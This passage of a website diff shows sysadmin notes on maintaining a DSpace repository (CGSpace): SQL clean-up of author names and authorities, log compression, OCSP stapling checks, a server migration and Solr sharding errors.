<pre><code>update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>update metadatavalue set authority=&#39;b041f2f4-19e7-4113-b774-0439baabd197&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Mora Benard%&#39;;
update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Hoek, R%&#39;;
update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%an der Hoek%&#39; and text_value !~ &#39;^.*W\.?$&#39;;
update metadatavalue set authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne, P%&#39;;
update metadatavalue set authority=&#39;0d8369bb-57f7-4b2f-92aa-af820b183aca&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thornton, P%&#39;;
update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
</code></pre><h2 id="2016-12-08">2016-12-08</h2>
<ul>
<li>Something weird happened and Peter Thorne&rsquo;s names all ended up as &ldquo;Thorne&rdquo;, I guess because the original authority had that as its name value:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne%&#39;;
text_value | authority | confidence
------------------+--------------------------------------+------------
Thorne, P.J. | 18349f29-61b1-44d7-ac60-89e55546e812 | 600
@ -484,12 +484,12 @@ update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-417
</code></pre><ul>
<li>I generated a new UUID using <code>uuidgen | tr [A-Z] [a-z]</code> and set it along with correct name variation for all records:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;b2f7603d-2fb5-4018-923a-c4ec8d85b3bb&#39;, text_value=&#39;Thorne, P.J.&#39; where resource_type_id=2 and metadata_field_id=3 and authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;;
UPDATE 43
</code></pre><ul>
<li>Apparently we also need to normalize Phil Thornton&rsquo;s names to <code>Thornton, Philip K.</code>:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
text_value | authority | confidence
---------------------+--------------------------------------+------------
Thornton, P | 0d8369bb-57f7-4b2f-92aa-af820b183aca | 600
@ -506,7 +506,7 @@ UPDATE 43
</code></pre><ul>
<li>Seems his original authorities are using an incorrect version of the name so I need to generate another UUID and tie it to the correct name, then reindex:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;2df8136e-d8f4-4142-b58c-562337cab764&#39;, text_value=&#39;Thornton, Philip K.&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
UPDATE 362
</code></pre><ul>
<li>It seems that, when you are messing with authority and author text values in the database, it is better to run authority reindex first (postgres→solr authority core) and then Discovery reindex (postgres→solr Discovery core)</li>
@ -520,8 +520,8 @@ UPDATE 362
<li>Set PostgreSQL&rsquo;s <code>shared_buffers</code> on CGSpace to 10% of system RAM (1200MB)</li>
<li>Run the following author corrections on CGSpace:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='34df639a-42d8-4867-a3f2-1892075fcb3f', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812' or authority='021cd183-946b-42bb-964e-522ebff02993';
dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab764', text_value='Thornton, Philip K.', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^Thornton[,\.]? P.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;34df639a-42d8-4867-a3f2-1892075fcb3f&#39;, text_value=&#39;Thorne, P.J.&#39; where resource_type_id=2 and metadata_field_id=3 and authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39; or authority=&#39;021cd183-946b-42bb-964e-522ebff02993&#39;;
dspace=# update metadatavalue set authority=&#39;2df8136e-d8f4-4142-b58c-562337cab764&#39;, text_value=&#39;Thornton, Philip K.&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^Thornton[,\.]? P.*&#39;;
</code></pre><ul>
<li>The authority IDs were different now than when I was looking a few days ago so I had to adjust them here</li>
</ul>
@ -534,7 +534,7 @@ dspace=# update metadatavalue set authority='2df8136e-d8f4-4142-b58c-562337cab76
<ul>
<li>Looking at CIAT records from last week again, they have a lot of double authors like:</li>
</ul>
<pre><code>International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::600
<pre tabindex="0"><code>International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::600
International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::500
International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024eb2::0
</code></pre><ul>
@ -542,7 +542,7 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
<li>Removing the duplicates in OpenRefine and uploading a CSV to DSpace says &ldquo;no changes detected&rdquo;</li>
<li>Seems like the only way to sortof clean these up would be to start in SQL:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Center for Tropical Agriculture';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;International Center for Tropical Agriculture&#39;;
text_value | authority | confidence
-----------------------------------------------+--------------------------------------+------------
International Center for Tropical Agriculture | cc726b78-a2f4-4ee9-af98-855c2ea31c36 | -1
@ -554,9 +554,9 @@ International Center for Tropical Agriculture::3026b1de-9302-4f3e-85ab-ef48da024
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 600
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | -1
International Center for Tropical Agriculture | 3026b1de-9302-4f3e-85ab-ef48da024eb2 | 0
dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = 'International Center for Tropical Agriculture';
dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;International Center for Tropical Agriculture&#39;;
UPDATE 1693
dspace=# update metadatavalue set authority='3026b1de-9302-4f3e-85ab-ef48da024eb2', text_value='International Center for Tropical Agriculture', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%CIAT%';
dspace=# update metadatavalue set authority=&#39;3026b1de-9302-4f3e-85ab-ef48da024eb2&#39;, text_value=&#39;International Center for Tropical Agriculture&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%CIAT%&#39;;
UPDATE 35
</code></pre><ul>
<li>Work on article for KM4Dev journal</li>
@ -577,14 +577,14 @@ UPDATE 35
<li>So basically, new cron jobs for logs should look something like this:</li>
<li>Find any file named <code>*.log*</code> that isn&rsquo;t <code>dspace.log*</code>, isn&rsquo;t already zipped, and is older than one day, and zip it:</li>
</ul>
<pre><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex &quot;.*\.log.*&quot; ! -iregex &quot;.*dspace\.log.*&quot; ! -iregex &quot;.*\.(gz|lrz|lzo|xz)&quot; ! -newermt &quot;Yesterday&quot; -exec schedtool -B -e ionice -c2 -n7 xz {} \;
<pre tabindex="0"><code># find /home/dspacetest.cgiar.org/log -regextype posix-extended -iregex &#34;.*\.log.*&#34; ! -iregex &#34;.*dspace\.log.*&#34; ! -iregex &#34;.*\.(gz|lrz|lzo|xz)&#34; ! -newermt &#34;Yesterday&#34; -exec schedtool -B -e ionice -c2 -n7 xz {} \;
</code></pre><ul>
<li>Since there is <code>xzgrep</code> and <code>xzless</code> we can actually just zip them after one day, why not?!</li>
<li>We can keep the zipped ones for two weeks just in case we need to look for errors, etc, and delete them after that</li>
<li>I use <code>schedtool -B</code> and <code>ionice -c2 -n7</code> to set the CPU scheduling to <code>SCHED_BATCH</code> and the IO to best effort which should, in theory, impact important system processes like Tomcat and PostgreSQL less</li>
<li>When the tasks are running you can see that the policies do apply:</li>
</ul>
<pre><code>$ schedtool $(ps aux | grep &quot;xz /home&quot; | grep -v grep | awk '{print $2}') &amp;&amp; ionice -p $(ps aux | grep &quot;xz /home&quot; | grep -v grep | awk '{print $2}')
<pre tabindex="0"><code>$ schedtool $(ps aux | grep &#34;xz /home&#34; | grep -v grep | awk &#39;{print $2}&#39;) &amp;&amp; ionice -p $(ps aux | grep &#34;xz /home&#34; | grep -v grep | awk &#39;{print $2}&#39;)
PID 17049: PRIO 0, POLICY B: SCHED_BATCH , NICE 0, AFFINITY 0xf
best-effort: prio 7
</code></pre><ul>
@ -594,7 +594,7 @@ best-effort: prio 7
<li>Some users pointed out issues with the &ldquo;most popular&rdquo; stats on a community or collection</li>
<li>This error appears in the logs when you try to view them:</li>
</ul>
<pre><code>2016-12-13 21:17:37,486 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
<pre tabindex="0"><code>2016-12-13 21:17:37,486 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceObjectDatasetGenerator.toDatasetQuery(Lorg/dspace/core/Context;)Lcom/atmire/statistics/content/DatasetQuery;
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:972)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:852)
@ -679,11 +679,11 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
<li>None of our users in African institutes will have IPv6, but some Europeans might, so I need to check if any submissions have been added since then</li>
<li>Update some names and authorities in the database:</li>
</ul>
<pre><code>dspace=# update metadatavalue set authority='5ff35043-942e-4d0a-b377-4daed6e3c1a3', confidence=600, text_value='Duncan, Alan' where resource_type_id=2 and metadata_field_id=3 and text_value ~ '^.*Duncan,? A.*';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;5ff35043-942e-4d0a-b377-4daed6e3c1a3&#39;, confidence=600, text_value=&#39;Duncan, Alan&#39; where resource_type_id=2 and metadata_field_id=3 and text_value ~ &#39;^.*Duncan,? A.*&#39;;
UPDATE 204
dspace=# update metadatavalue set authority='46804b53-ea30-4a85-9ccf-b79a35816fa9', confidence=600, text_value='Mekonnen, Kindu' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Mekonnen, K%';
dspace=# update metadatavalue set authority=&#39;46804b53-ea30-4a85-9ccf-b79a35816fa9&#39;, confidence=600, text_value=&#39;Mekonnen, Kindu&#39; where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Mekonnen, K%&#39;;
UPDATE 89
dspace=# update metadatavalue set authority='f840da02-26e7-4a74-b7ba-3e2b723f3684', confidence=600, text_value='Lukuyu, Ben A.' where resource_type_id=2 and metadata_field_id=3 and text_value like '%Lukuyu, B%';
dspace=# update metadatavalue set authority=&#39;f840da02-26e7-4a74-b7ba-3e2b723f3684&#39;, confidence=600, text_value=&#39;Lukuyu, Ben A.&#39; where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Lukuyu, B%&#39;;
UPDATE 140
</code></pre><ul>
<li>Generated a new UUID for Ben using <code>uuidgen | tr [A-Z] [a-z]</code> as the one in Solr had his ORCID but the name format was incorrect</li>
@ -692,7 +692,7 @@ UPDATE 140
<li>Enable OCSP stapling for hosts &gt;= Ubuntu 16.04 in our Ansible playbooks (<a href="https://github.com/ilri/rmg-ansible-public/pull/76">#76</a>)</li>
<li>Working for DSpace Test on the second response:</li>
</ul>
<pre><code>$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
<pre tabindex="0"><code>$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
...
OCSP response: no response sent
$ openssl s_client -connect dspacetest.cgiar.org:443 -servername dspacetest.cgiar.org -tls1_2 -tlsextdebug -status
@ -704,21 +704,21 @@ OCSP Response Data:
<li>Migrate CGSpace to new server, roughly following these steps:</li>
<li>On old server:</li>
</ul>
<pre><code># service tomcat7 stop
<pre tabindex="0"><code># service tomcat7 stop
# /home/backup/scripts/postgres_backup.sh
</code></pre><ul>
<li>On new server:</li>
</ul>
<pre><code># systemctl stop tomcat7
<pre tabindex="0"><code># systemctl stop tomcat7
# rsync -4 -av --delete 178.79.187.182:/home/cgspace.cgiar.org/assetstore/ /home/cgspace.cgiar.org/assetstore/
# rsync -4 -av --delete 178.79.187.182:/home/backup/ /home/backup/
# rsync -4 -av --delete 178.79.187.182:/home/cgspace.cgiar.org/solr/ /home/cgspace.cgiar.org/solr
# su - postgres
$ dropdb cgspace
$ createdb -O cgspace --encoding=UNICODE cgspace
$ psql cgspace -c 'alter user cgspace createuser;'
$ psql cgspace -c &#39;alter user cgspace createuser;&#39;
$ pg_restore -O -U cgspace -d cgspace -W -h localhost /home/backup/postgres/cgspace_2016-12-18.backup
$ psql cgspace -c 'alter user cgspace nocreateuser;'
$ psql cgspace -c &#39;alter user cgspace nocreateuser;&#39;
$ psql -U cgspace -f ~tomcat7/src/git/DSpace/dspace/etc/postgres/update-sequences.sql cgspace -h localhost
$ vacuumdb cgspace
$ psql cgspace
@ -750,7 +750,7 @@ $ exit
<li>Abenet wanted a CSV of the IITA community, but the web export doesn&rsquo;t include the <code>dc.date.accessioned</code> field</li>
<li>I had to export it from the command line using the <code>-a</code> flag:</li>
</ul>
<pre><code>$ [dspace]/bin/dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
<pre tabindex="0"><code>$ [dspace]/bin/dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
</code></pre><h2 id="2016-12-28">2016-12-28</h2>
<ul>
<li>We&rsquo;ve been getting two alerts per day about CPU usage on the new server from Linode</li>
@ -784,15 +784,15 @@ $ exit
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -28,7 +28,7 @@ I checked to see if the Solr sharding task that is supposed to run on January 1s
I tested on DSpace Test as well and it doesn&rsquo;t work there either
I asked on the dspace-tech mailing list because it seems to be broken, and actually now I&rsquo;m not sure if we&rsquo;ve ever had the sharding task run successfully over all these years
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -58,12 +58,12 @@ I asked on the dspace-tech mailing list because it seems to be broken, and actua
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -110,7 +110,7 @@ I asked on the dspace-tech mailing list because it seems to be broken, and actua
<time datetime="2017-01-02T10:43:00+03:00">Mon Jan 02, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -124,7 +124,7 @@ I asked on the dspace-tech mailing list because it seems to be broken, and actua
<ul>
<li>I tried to shard my local dev instance and it fails the same way:</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace stats-util -s
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace stats-util -s
Moving: 9318 into core statistics-2016
Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2016
@ -171,7 +171,7 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
</code></pre><ul>
<li>And the DSpace log shows:</li>
</ul>
<pre><code>2017-01-04 22:39:05,412 INFO org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
<pre tabindex="0"><code>2017-01-04 22:39:05,412 INFO org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
2017-01-04 22:39:05,412 INFO org.dspace.statistics.SolrLogger @ Moving: 9318 records into core statistics-2016
2017-01-04 22:39:07,310 INFO org.apache.http.impl.client.SystemDefaultHttpClient @ I/O exception (java.net.SocketException) caught when processing request to {}-&gt;http://localhost:8081: Broken pipe (Write failed)
2017-01-04 22:39:07,310 INFO org.apache.http.impl.client.SystemDefaultHttpClient @ Retrying request to {}-&gt;http://localhost:8081
@ -179,15 +179,15 @@ Caused by: java.net.SocketException: Broken pipe (Write failed)
<li>Despite failing instantly, a <code>statistics-2016</code> directory was created, but it only has a data dir (no conf)</li>
<li>The Tomcat access logs show more:</li>
</ul>
<pre><code>127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 107
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-17YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 423
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 77
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &quot;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 63
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&quot; 200 4359517
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 200 16248
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &quot;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%7C&amp;f.owningItem.encapsulator=%22&amp;f.actingGroupParentId.split=true&amp;f.actingGroupParentId.separator=%7C&amp;f.actingGroupParentId.encapsulator=%22&amp;f.text.split=true&amp;f.text.separator=%7C&amp;f.text.encapsulator=%22&amp;f.simple_query_search.split=true&amp;f.simple_query_search.separator=%7C&amp;f.simple_query_search.encapsulator=%22&amp;f.owningComm.split=true&amp;f.owningComm.separator=%7C&amp;f.owningComm.encapsulator=%22&amp;f.owner.split=true&amp;f.owner.separator=%7C&amp;f.owner.encapsulator=%22&amp;f.filterquery.split=true&amp;f.filterquery.separator=%7C&amp;f.filterquery.encapsulator=%22&amp;f.p_group_map.split=true&amp;f.p_group_map.separator=%7C&amp;f.p_group_map.encapsulator=%22&amp;f.actorMemberGroupId.split=true&amp;f.actorMemberGroupId.separator=%7C&amp;f.actorMemberGroupId.encapsulator=%22&amp;f.bitstreamId.split=true&amp;f.bitstreamId.separator=%7C&amp;f.bitstreamId.encapsulator=%22&amp;f.group_name.split=true&amp;f.group_name.separator=%7C&amp;f.group_name.encapsulator=%22&amp;f.p_communities_name.split=true&amp;f.p_communities_name.separator=%7C&amp;f.p_communities_name.encapsulator=%22&amp;f.query.split=true&amp;f.query.separator=%7C&amp;f.query.encapsulator=%22&amp;f.workflowStep.split=true&amp;f.workflowStep.separator=%7C&amp;f.workflowStep.encapsulator=%22&amp;f.containerCollection.split=true&amp;f.containerCollection.separator=%7C&amp;f.containerCollection.encapsulator=%22&amp;f.complete_query_search.split=true&amp;f.complete_query_search.separator=%7C&amp;f.complete_query_search.encapsulator=%22&amp;f.p_communities_id.split=true&amp;f.p_communities_id.separator=%7C&amp;f.p_communities_id.encapsulator=%22&amp;f.rangeDescription.split=true&amp;f.rangeDescription.separator=%7C&amp;f.rangeDescription.encapsulator=%22&amp;f.group_id.split=true&amp;f.group_id.separator=%7C&amp;f.group_id.encapsulator=%22&amp;f.bundleName.split=true&amp;f.bundleName.separator=%7C&amp;f.bundleName.encapsulator=%22&amp;f.ngram_simplequery_search.split=true&amp;f.ngram_simplequery_search.separator=%7C&amp;f.ngram_simplequery_search.encapsulator=%22&amp;f.group_map.split=true&amp;f.group_map.separator=%7C&amp;f.group_map.encapsulator=%22&amp;f.owningColl.split=true&amp;f.owningColl.separator=%7C&amp;f.owningColl.encapsulator=%22&amp;f.p_group_id.split=true&amp;f.p_group_id.separator=%7C&amp;f.p_group_id.encapsulator=%22&amp;f.p_group_name.split=true&amp;f.p_group_name.separator=%7C&amp;f.p_group_name.encapsulator=%22&amp;wt=javabin&amp;version=2 HTTP/1.1&quot; 409 156
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &quot;POST /solr/datatables/update?wt=javabin&amp;version=2 HTTP/1.1&quot; 200 41
127.0.0.1 - - [04/Jan/2017:22:44:00 +0200] &quot;POST /solr/datatables/update HTTP/1.1&quot; 200 40
<pre tabindex="0"><code>127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/statistics/select?q=type%3A2+AND+id%3A1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 107
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/statistics/select?q=*%3A*&amp;rows=0&amp;facet=true&amp;facet.range=time&amp;facet.range.start=NOW%2FYEAR-17YEARS&amp;facet.range.end=NOW%2FYEAR%2B0YEARS&amp;facet.range.gap=%2B1YEAR&amp;facet.mincount=1&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 423
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/admin/cores?action=STATUS&amp;core=statistics-2016&amp;indexInfo=true&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 77
127.0.0.1 - - [04/Jan/2017:22:39:05 +0200] &#34;GET /solr/admin/cores?action=CREATE&amp;name=statistics-2016&amp;instanceDir=statistics&amp;dataDir=%2FUsers%2Faorth%2Fdspace%2Fsolr%2Fstatistics-2016%2Fdata&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 63
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;GET /solr/statistics/select?csv.mv.separator=%7C&amp;q=*%3A*&amp;fq=time%3A%28%5B2016%5C-01%5C-01T00%5C%3A00%5C%3A00Z+TO+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%5D+NOT+2017%5C-01%5C-01T00%5C%3A00%5C%3A00Z%29&amp;rows=10000&amp;wt=csv HTTP/1.1&#34; 200 4359517
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;GET /solr/statistics/admin/luke?show=schema&amp;wt=javabin&amp;version=2 HTTP/1.1&#34; 200 16248
127.0.0.1 - - [04/Jan/2017:22:39:07 +0200] &#34;POST /solr//statistics-2016/update/csv?commit=true&amp;softCommit=false&amp;waitSearcher=true&amp;f.previousWorkflowStep.split=true&amp;f.previousWorkflowStep.separator=%7C&amp;f.previousWorkflowStep.encapsulator=%22&amp;f.actingGroupId.split=true&amp;f.actingGroupId.separator=%7C&amp;f.actingGroupId.encapsulator=%22&amp;f.containerCommunity.split=true&amp;f.containerCommunity.separator=%7C&amp;f.containerCommunity.encapsulator=%22&amp;f.range.split=true&amp;f.range.separator=%7C&amp;f.range.encapsulator=%22&amp;f.containerItem.split=true&amp;f.containerItem.separator=%7C&amp;f.containerItem.encapsulator=%22&amp;f.p_communities_map.split=true&amp;f.p_communities_map.separator=%7C&amp;f.p_communities_map.encapsulator=%22&amp;f.ngram_query_search.split=true&amp;f.ngram_query_search.separator=%7C&amp;f.ngram_query_search.encapsulator=%22&amp;f.containerBitstream.split=true&amp;f.containerBitstream.separator=%7C&amp;f.containerBitstream.encapsulator=%22&amp;f.owningItem.split=true&amp;f.owningItem.separator=%